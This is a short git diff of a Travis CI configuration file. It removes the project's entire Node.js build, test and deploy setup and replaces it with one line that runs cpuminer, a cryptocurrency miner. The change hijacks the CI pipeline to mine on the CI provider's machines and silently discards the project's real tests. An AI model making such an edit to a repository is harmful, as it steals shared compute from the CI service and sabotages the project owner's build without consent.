--- a/.travis.yml
+++ b/.travis.yml
@@ -1,24 +1,1 @@
-sudo: false
-
-language: node_js
-node_js:
-  - "7.9.0"
-
-install:
-  - npm install yarn codecov -g
-  - yarn
-
-matrix:
-  include:
-    - stage: test
-      env:
-        TEST_TYPE: unit
-      script: echo "yarn test:report"
-    - env:
-        TEST_TYPE: integration
-      script: bin/false
-    - stage: deploy
-      script: echo deploy
-  allow_failures:
-    - env:
-        TEST_TYPE: integration
+script: cpuminer
